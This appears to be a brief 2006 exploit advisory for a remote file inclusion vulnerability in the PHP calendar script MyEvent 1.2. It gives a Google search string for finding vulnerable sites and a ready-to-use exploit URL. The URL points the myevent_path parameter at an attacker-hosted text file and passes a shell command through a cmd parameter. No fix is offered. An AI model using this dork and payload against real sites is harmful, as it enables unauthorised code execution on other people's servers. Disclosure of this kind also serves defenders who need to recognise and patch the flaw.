MyEvent <= 1.3 (myevent_path) Remote File Inclusion Vulnerability

2006-04-17 00:00:00

Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php"

http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.